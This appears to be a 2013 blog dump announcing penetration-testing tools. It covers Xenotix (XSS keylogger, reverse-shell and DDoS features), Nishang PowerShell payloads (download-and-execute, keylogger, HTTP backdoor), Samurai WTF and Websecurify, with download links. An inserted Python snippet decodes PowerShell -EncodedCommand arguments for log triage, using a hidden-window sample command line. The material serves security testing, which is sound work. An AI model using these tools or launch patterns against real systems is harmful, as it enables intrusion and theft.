<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Tutorials</span><br /><span style="font-family: Georgia, 'Times New Roman', serif;">Version 3 Videos </span></span><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://www.youtube.com/watch?v=CJEgO4_kd-8" style="outline: none;">OWASP Xenotix XSS Exploit Framework v3 2013: XSS Scanner Module</a></span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://www.youtube.com/watch?v=owfF9C_Xerw" style="outline: none;">OWASP Xenotix XSS Exploit Framework v3 2013: XSS Keylogger</a></span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://www.youtube.com/watch?v=i8c3kf4t6A8" style="outline: none;">OWASP Xenotix XSS Exploit Framework v3 2013: XSS Executable Drive-By</a></span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://www.youtube.com/watch?v=IT-8IH3yRrA" style="outline: none;">OWASP Xenotix XSS Exploit Framework v3 2013: XSS Reverse Shell</a></span></li>
<li><a href="http://www.youtube.com/watch?v=cgLGgVWvi9Y" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">OWASP Xenotix XSS Exploit Framework v3 2013: XSS DDoSer</span></span></a></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Version 2 Videos </span></span><ul style="line-height: 19.1875px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><a href="http://www.youtube.com/watch?v=ei1ny7L8-8k" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">Xenotix XSS Exploit Framework 2013 Version 2 Tutorial</span></span></a></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Version 1 Videos </span></span><ul style="line-height: 19.1875px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><a href="http://www.youtube.com/watch?v=UyxEV3FLiX8" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">Xenotix XSS Exploit Framework 2012 Version 1 Tutorial</span></span></a></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Talk on OWASP Xenotix XSS Exploit Framework [video] </span></span><ul style="line-height: 19.1875px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><a href="http://www.youtube.com/watch?v=NYZLP0q7-y4" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">OWASP Xenotix XSS Exploit Framework v2 2012: Talk at ClubHack 2012, India</span></span></a></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">IMPORTANT</span></span><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">The tool may be detected as a threat by some anti-virus solutions; this is due to the features of the exploitation framework.</span></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Download </span></span><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Version 4 <a href="http://keralacyberforce.in/downloads/Xenotix%20XSS%20Exploit%20Framework%20V4.rar" style="outline: none;">Download OWASP Xenotix XSS Exploit Framework v4</a></span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Version 4 Mirror: <a href="https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar" style="outline: none;">DropBox</a></span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Version 3 <a href="https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip" style="outline: none;">File:OWASP Xenotix XSS Exploit Framework v3 2013.zip</a></span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Version 2 <a href="https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip" style="outline: none;">File:Xenotix XSS Exploit Framework 2013 v2.zip</a></span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Version 1 <a href="https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip" style="outline: none;">File:Xenotix XSS Exploitation Framework.zip</a></span></li>
</ul>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Screenshot -</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmGzqRUEpYAwyltKThjwFtbW-ZY-RIfYkSKI7hyphenhyphenYRrTnA89Q520TrEgUf0RILsAsdUpw-_U4YoJUMex_Ge_NyLw_xaZv4ffXuYnzsGrG01lXDzKlB-KVSUPNN4GngOOx0nUCHm0rgNWjZv/s1600/800px-Xenotix.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmGzqRUEpYAwyltKThjwFtbW-ZY-RIfYkSKI7hyphenhyphenYRrTnA89Q520TrEgUf0RILsAsdUpw-_U4YoJUMex_Ge_NyLw_xaZv4ffXuYnzsGrG01lXDzKlB-KVSUPNN4GngOOx0nUCHm0rgNWjZv/s1600/800px-Xenotix.png" style="border: none; padding: 0px;" width="400" /></span></span></a></div>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><span style="font-family: Georgia, 'Times New Roman', serif;">Source-</span><br /><a href="https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework" style="outline: none;"><span style="font-family: Georgia, 'Times New Roman', serif;">https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework</span></a></span></div>
</div>
Fahim (http://www.blogger.com/profile/06549473576655561875), published 2013-09-02T14:16:00-07:00, updated 2013-09-02T14:16:24-07:00: Nishang 0.3.0 released - Penetration Testing Using PowerShell<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPj-A7PDEEPvHklaDetwurXHh7xBHR78jFjQhdB3nldtPyz-qDH06nLsKSSNeEiBrLHjjiDIR2B2ZWWRI0Dfzhs9hXxexE03jiM7yUTu4rG-TCEmYqcbWnHdwiSDWuITa7moG7HCUrkPu_/s1600/powershell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPj-A7PDEEPvHklaDetwurXHh7xBHR78jFjQhdB3nldtPyz-qDH06nLsKSSNeEiBrLHjjiDIR2B2ZWWRI0Dfzhs9hXxexE03jiM7yUTu4rG-TCEmYqcbWnHdwiSDWuITa7moG7HCUrkPu_/s1600/powershell.png" style="border: none; padding: 0px;" /></span></span></a></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Nishang is a framework and collection of scripts and payloads that enables the use of PowerShell for offensive security and post-exploitation during penetration tests. The scripts were written to meet the author's needs during real penetration tests.</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">PAYLOADS</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">It contains many interesting scripts such as download-and-execute, keylogger, DNS TXT pwnage, wait-for-command and much more.</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">HELP</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">All payloads and scripts are Get-Help compatible. Use "Get-Help &lt;scriptname.ps1&gt; -full" at a PowerShell prompt to get the full help details.</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">LATEST CODE</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Check out the SVN repository for the latest code:</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">svn checkout <a href="http://nishang.googlecode.com/svn/trunk/" rel="nofollow" style="outline: none;">http://nishang.googlecode.com/svn/trunk/</a> nishang</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">More details on my blog <a href="http://labofapenetrationtester.blogspot.com/" rel="nofollow" style="outline: none;">http://labofapenetrationtester.blogspot.com</a></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;">CHANGELOG</span><br />
<ul style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Added Powerpreter</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Added Execute-DNSTXT-Code</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Bug fix in Create-MultipleSessions.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Changes to StringToBase64. It now supports Unicode encoding, which makes it usable with -EncodedCommand.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">More Changes to StringToBase64. Now a file can be converted.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Added Copy-VSS</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Information_Gather shows output in better format now.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Information_Gather renamed to Get-Information.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Wait for command renamed to HTTP-Backdoor.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Time_Execution renamed to Execute-OnTime</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Invoke-PingSweep renamed to Port-Scan</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Invoke-Medusa renamed to Brute-Force</span></li>
</ul>
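The -EncodedCommand item in the changelog above hinges on one detail: powershell.exe expects base64 over the UTF-16LE ("Unicode") bytes of the script, so a base64 string built over plain ASCII or UTF-8 bytes does not work. The same fact is what a defender needs when decoding such arguments out of process-creation logs. This is an added example, not Nishang code; the command line it parses and the script inside it are constructed.

```python
"""Encode and decode PowerShell -EncodedCommand payloads (UTF-16LE + base64).
Added example for triage of process-creation logs; sample data is constructed."""
import base64


def to_encoded_command(script: str) -> str:
    """Encode as powershell.exe expects: UTF-16LE bytes, then standard base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse the encoding. An odd byte count cannot be UTF-16LE, which is what
    a base64 string built over ASCII/UTF-8 bytes often produces."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: payload is not UTF-16LE")
    return raw.decode("utf-16-le")


def is_plausible_script(text: str) -> bool:
    """Triage heuristic: a real script decodes to printable ASCII text. ASCII
    bytes mis-read as UTF-16LE come out as characters in the CJK range instead."""
    return all((ch.isprintable() and ord(ch) < 0x7F) or ch in "\r\n\t" for ch in text)


def extract_encoded_commands(cmdline: str) -> list[str]:
    """Decode every -EncodedCommand argument in a process command line.
    powershell.exe accepts any unambiguous prefix of the switch (-e, -ec, -enc,
    ...), so we match by prefix rather than on the full switch name."""
    decoded = []
    tokens = cmdline.split()
    for switch, value in zip(tokens, tokens[1:]):
        if not switch.startswith("-"):
            continue
        name = switch[1:].lower()
        if not name or not "encodedcommand".startswith(name):
            continue
        try:
            decoded.append(decode_encoded_command(value))
        except ValueError:
            # Keep the evidence even when it does not decode cleanly.
            decoded.append(f"<undecodable payload: {value[:16]}...>")
    return decoded


# Constructed sample data (not taken from the page or from any real system).
SAMPLE_SCRIPT = "Get-Process | Out-File C:\\Temp\\procs.txt"
SAMPLE_CMDLINE = ("powershell.exe -NoProfile -WindowStyle Hidden -enc "
                  + to_encoded_command(SAMPLE_SCRIPT))
# The kind of string -EncodedCommand does NOT accept: base64 over UTF-8 bytes.
UTF8_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-8")).decode("ascii")
# Eleven ASCII bytes: an odd count, so it cannot even be parsed as UTF-16LE.
ODD_B64 = base64.b64encode(b"Get-Process").decode("ascii")

if __name__ == "__main__":
    for script in extract_encoded_commands(SAMPLE_CMDLINE):
        print("decoded:", script, "| plausible:", is_plausible_script(script))
    wrong = decode_encoded_command(UTF8_B64)
    print("UTF-8 payload read as UTF-16LE is plausible:", is_plausible_script(wrong))
```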
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Download -</span></div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;"><a href="https://nishang.googlecode.com/files/nishang_0.3.0.zip" style="outline: none;">nishang_0.3.0.zip</a></span><br />
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="https://code.google.com/p/nishang/downloads/list" style="outline: none;">Download other versions from here</a></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Some blog posts to check out to begin with:</span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<a href="http://labofapenetrationtester.blogspot.in/2012/08/introducing-nishang-powereshell-for.html" rel="nofollow" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">http://labofapenetrationtester.blogspot.in/2012/08/introducing-nishang-powereshell-for.html</span></span></a></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://labofapenetrationtester.blogspot.in/2013/08/powerpreter-and-nishang-Part-1.html" rel="nofollow" style="outline: none;">http://labofapenetrationtester.blogspot.in/2013/08/powerpreter-and-nishang-Part-1.html</a></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Source-</span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<a href="https://code.google.com/p/nishang/" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">https://code.google.com/p/nishang/</span></span></a></div>
</div>
</div>
Fahim (http://www.blogger.com/profile/06549473576655561875), published 2013-09-02T14:15:00-07:00, updated 2013-09-02T14:15:58-07:00: Samurai Web Testing Framework v2.1 released<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 17px; margin-bottom: 15px; margin-top: 15px; min-height: 1px; padding: 0px; text-align: justify;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">The Samurai Web Testing Framework is a live Linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open-source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.</span></div>
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuTfFaP0DG3d6VQKaFIBbsz1t7gQcr6zreb7hlMhDyBHt2VGO4kOYKM-_DIBDTOu_i-AsuAPyB-x4hp7mEmdhLCdUusuhzZNJXvTHzlNOErxPpcoee-bHRMwtfeXADrMcr3bdh4JOmf2uW/s1600/189635.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuTfFaP0DG3d6VQKaFIBbsz1t7gQcr6zreb7hlMhDyBHt2VGO4kOYKM-_DIBDTOu_i-AsuAPyB-x4hp7mEmdhLCdUusuhzZNJXvTHzlNOErxPpcoee-bHRMwtfeXADrMcr3bdh4JOmf2uW/s1600/189635.jpg" style="border: none; padding: 0px;" width="400" /></span></span></a></div>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;"><span style="line-height: 17px; text-align: justify;">Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such as WebScarab and ratproxy. We then chose tools for discovery; these include w3af and Burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.</span></span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18px;"><span style="font-family: Georgia, 'Times New Roman', serif;"><br /></span></span></span><br />
<h3 class="r" style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 20px; font-weight: normal; line-height: 20px; margin: 0px; overflow: hidden; padding: 0px; text-overflow: ellipsis; white-space: nowrap;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Samurai Web Testing Framework v2.1 released</span></h3>
<span style="background-color: white;"><span style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="-webkit-tap-highlight-color: rgb(0, 119, 170); border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;"><a href="http://sourceforge.net/projects/samurai/files/latest/download?source=files" style="-webkit-tap-highlight-color: rgb(0, 119, 170); margin: 0px; outline: none; padding: 0px; vertical-align: baseline;" title="/SamuraiWTF 2.0 Branch/SamuraiWTF-2.1.vmware.zip: released on 2013-08-12 05:50:25 UTC">Download SamuraiWTF-2.1.vmware.zip (2.8 GB)</a></span></span></span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="-webkit-tap-highlight-color: rgb(0, 119, 170); border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;"><a href="http://sourceforge.net/projects/samurai/" style="outline: none;">Download other versions</a> </span></span></span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="-webkit-tap-highlight-color: rgb(0, 119, 170); border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;"><br /></span></span></span><span style="font-family: 'Droid Sans', Arial, 
Helvetica, sans-serif; font-size: 13px; line-height: 20px;"></span><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;"><span style="line-height: 18px;">Source- </span></span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><a href="http://sourceforge.net/projects/samurai/" style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; outline: none;"><span style="font-family: Georgia, 'Times New Roman', serif;">http://sourceforge.net/projects/samurai/</span></a></span></div>
Fahim (http://www.blogger.com/profile/06549473576655561875), published 2013-09-02T14:12:00-07:00, updated 2013-09-02T14:12:43-07:00: Websecurify Security Testing Runtime - powerful web application security testing platform<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<pre style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px; margin-bottom: 20px; margin-top: 20px; max-width: 80em; padding-left: 0.7em; white-space: pre-wrap;">
<span style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 23px; text-align: justify; white-space: normal;"><span style="font-family: Georgia, 'Times New Roman', serif;">Websecurify Security Testing Runtime </span></span>
<span style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 23px; text-align: justify; white-space: normal;"><span style="font-family: Georgia, 'Times New Roman', serif;">Websecurify is a powerful web application security testing platform designed from the ground up to provide the best combination of automatic and manual vulnerability testing technologies. </span></span>
<span style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 23px; text-align: justify; white-space: normal;"><span style="font-family: Georgia, 'Times New Roman', serif;">Some of the main features of Websecurify include:</span></span>
<ul style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 23px; white-space: normal;">
<li>Available for all major operating systems (Windows, Mac OS, Linux), including mobile devices (iPhone, Android)</li>
<li>Simple-to-use user interface</li>
<li>Built-in internationalization support</li>
<li>Easily extensible with the help of add-ons and plugins</li>
<li>Modular and reusable design based on the Weaponry Framework</li>
<li>Powerful manual testing tools and helper facilities</li>
<li>Powerful analytical and scanning technology</li>
</ul>
<div class="separator" style="background-color: #333333; clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 20px; text-align: center; white-space: normal;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLmgi54mcuHrPiUlE5V2eE7wLroJcafN8bjVnhfkd4JrNl5JR_w_RnfO9vkuyAmz2CIaxQ3fd1B1eGVmdgojNlRpJg1Jvq9pp2gCi_qwbeE-wxcIcMk1LqezxN912qQyWVOcRFbcLgCJg_/s1600/screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; outline: none;"><span style="font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLmgi54mcuHrPiUlE5V2eE7wLroJcafN8bjVnhfkd4JrNl5JR_w_RnfO9vkuyAmz2CIaxQ3fd1B1eGVmdgojNlRpJg1Jvq9pp2gCi_qwbeE-wxcIcMk1LqezxN912qQyWVOcRFbcLgCJg_/s1600/screenshot.png" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="320" /></span></span></a></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<span style="font-family: Georgia, 'Times New Roman', serif;">Websecurify is a commercial product but we are committed to support our open-source version, which you will be able to find in the <a href="http://code.google.com/p/websecurify/Downloads/list" rel="nofollow" style="outline: none;">downloads section</a> of this website. For more options just visit <a href="http://www.websecurify.com/" rel="nofollow" style="outline: none;">http://www.websecurify.com</a>.</span></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<span style="font-family: Georgia, 'Times New Roman', serif;">
</span></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<span style="font-family: Georgia, 'Times New Roman', serif;">If you just want a quick test without installing any additional software on your computer, visit our online <a href="https://suite.websecurify.com/" rel="nofollow" style="outline: none;">Suite</a>. This is the quickest way to test your application for security vulnerabilities, and it is free.</span></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<span style="font-family: Georgia, 'Times New Roman', serif;">
</span></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<span style="font-family: Georgia, 'Times New Roman', serif;">Download -</span></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<a href="https://code.google.com/p/websecurify/downloads/list" style="outline: none;"><span style="font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">https://code.google.com/p/websecurify/downloads/list</span></span></a></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<span style="font-family: Georgia, 'Times New Roman', serif;">
</span></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<span style="font-family: Georgia, 'Times New Roman', serif;">Source-</span></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<a href="https://code.google.com/p/websecurify/" style="outline: none;"><span style="font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">https://code.google.com/p/websecurify/</span></span></a></div>
</pre>
</div>
</div>
Fahim (http://www.blogger.com/profile/06549473576655561875), published 2013-09-02T14:10:00-07:00, updated 2013-09-02T14:10:38-07:00: Hackpak2013 - collection of pentesting scripts.<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">To run a specific file:</span></div>
<ul style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; max-width: 62em; padding-left: 25px;">
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">python file.py</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">perl file.pl</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">PHP files need to be run in a browser.</span></li>
</ul>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
</div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Other versions of these tools:</span></div>
<ol style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; max-width: 62em; padding-left: 25px;">
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://code.google.com/p/secscan-py/" rel="nofollow" style="outline: none;">SecScan/SecS/SecL</a> (the only difference from SecScan is that this link has the updated UI version)</span></li>
